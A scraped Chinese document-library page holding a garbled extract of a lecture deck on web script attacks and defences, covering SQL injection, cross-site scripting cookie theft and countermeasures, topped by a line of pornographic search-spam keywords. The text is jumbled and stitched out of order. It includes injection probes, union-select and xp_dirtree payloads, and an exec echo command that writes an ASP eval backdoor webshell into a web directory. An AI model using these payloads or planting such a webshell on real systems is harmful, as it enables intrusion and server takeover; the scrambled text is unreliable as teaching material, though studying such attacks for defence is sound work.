freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡腳本攻擊與防御ppt(存儲版)

2025-01-07 11:50上一頁面

下一頁面
  

【正文】 交過來的空格字符 str=replace(str, ,amp。x26。 domain = DOMAIN_NAME。 。 利用 JavaScript來設(shè)置 cookie: 利用 javascript,可以在本地瀏覽器中設(shè)置cookie格式: name=value的屬性是指定cookie數(shù)據(jù)項的名稱 ,value是該名稱對應的值 ,它是一個字符串。彈出框表明cookie修改成功。owen ?將參數(shù)直接帶入查詢 sql,conn,1,1 title=rsnews(title) if and then (數(shù)據(jù)庫出錯 ) else ? request獲取變量的方式: 的是 post數(shù)據(jù), get數(shù)據(jù), cookie中的數(shù)據(jù)。 = amp。 expires = DATE。) ? str=replace(str,:,: ) ? str=replace(str,amp。,amp。 解決方案 1: 過濾用戶提交的變量中的 和 ,轉(zhuǎn)換成 16進制 str=replace(str,amp。 跨站 Script攻擊范例 ? form action= ? input type=text name=a size=40 ? input type=submit value=提交 ? /form ? % ? str=request(a) ? str ? % 跨站盜取 cookie 什么是 cookie? ? Cookie,有時也用其復數(shù)形式 Cookies,指某些網(wǎng)站為了辨別用戶身份、進行 session跟蹤而儲存在用戶本地終端上的數(shù)據(jù)(通常經(jīng)過加密)。 ? ,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在 2字段顯示出字段內(nèi)容則存在些字段。 ? 聯(lián)合查詢功能 。,39。,39。 如果還是不成功,可以再嘗試加上 SQL帳戶: exec xxx exec xxx,sysadmin 然后用 SQL查詢分析器連接上去再執(zhí)行: declare cmd INT exec sp_oacreate 39。Xp_regremovemultistring39。Xp_regdeletekey39。Sp_OAMethod39。Sp_OACreate39。insert into tmp exec master..xp_dirtree ?d:\?,1,1 ? 獲取第一條數(shù)據(jù): and (select name from tmp where id=1)1 ? 這樣通過遞增 ID就可以把所有目錄讀取出來,一定可以找出 web目錄。 db_owner權(quán)限下的注入 直接獲取 webshell的方法: WEB路徑 在 db_owner權(quán)限下要得到 WEB路徑基本只有兩個辦法: ? 利用擴展存儲過程 xp_regread,只要有 Public權(quán)限就可以運行它。exec ?echo ^^%eval request(chr(35))%^^ D:\WEB\?。 什么是 webshell? 所謂 webshell就是一個 asp或 php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務器的 web目錄中,與正常的網(wǎng)頁文件混在一起。)) 。/Script 39。owen sql,conn,1,1 title=rsnews(title) if and then (數(shù)據(jù)庫出錯 ) else % ? ? and 1=2 sql=select * from news where id=37 and 1=2 ? and 1=1 ? and 0(select count(*) from admin) 猜測是否存在 admin表 ? and 1=(select count(*) from admin where len(pass)0) 猜測是否存在 pass字段 ? and 1=(select count(*) from admin where len(password)0) ? and (select asc(mid(password,1,1)) from admin)100 假設(shè) pssword字段中第一個記錄的第一位的 ASCII碼大于 100,如果假設(shè)正確則應該返回正常頁面 猜測 password字段是否存在 防止 SQL注入 (1) 在服務端正式處理之前對提交數(shù)據(jù)的合法性進行檢查; (2) 封裝客戶端提交信息; (3) 替換或刪除敏感字符 /字符串; (4) 屏蔽出錯信息。 之前有未閉合的引號。 字符串的語法錯誤 在查詢表達式 39。OR? 39。39。第五章 腳本攻擊與防御 1 SQL注入技術(shù) ?什么是 SQL注入技術(shù)? SQL注入即是指攻擊者通過在應用程序中預先定義好的查詢語句結(jié)尾加上額外的SQL語句元素,欺騙數(shù)據(jù)庫服務器執(zhí)行非授權(quán)的任意查詢。 password1 amp。 and password=? 39。80040e1439。39。cstr(request(id)) sql sql=select * from news where id=amp。)。db_owner39。 2. 無法直接連接服務器 取得 webshell。假如 web目錄為 D:\WEB,具體語句如下: 。 其次 ,處理方法與“ Web和數(shù)據(jù)庫在一臺服務器”情況相同。CREATE TABLE tmp([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL)。 EXEC sp_dropextendedproc 39。 EXEC
點擊復制文檔內(nèi)容
教學課件相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號-1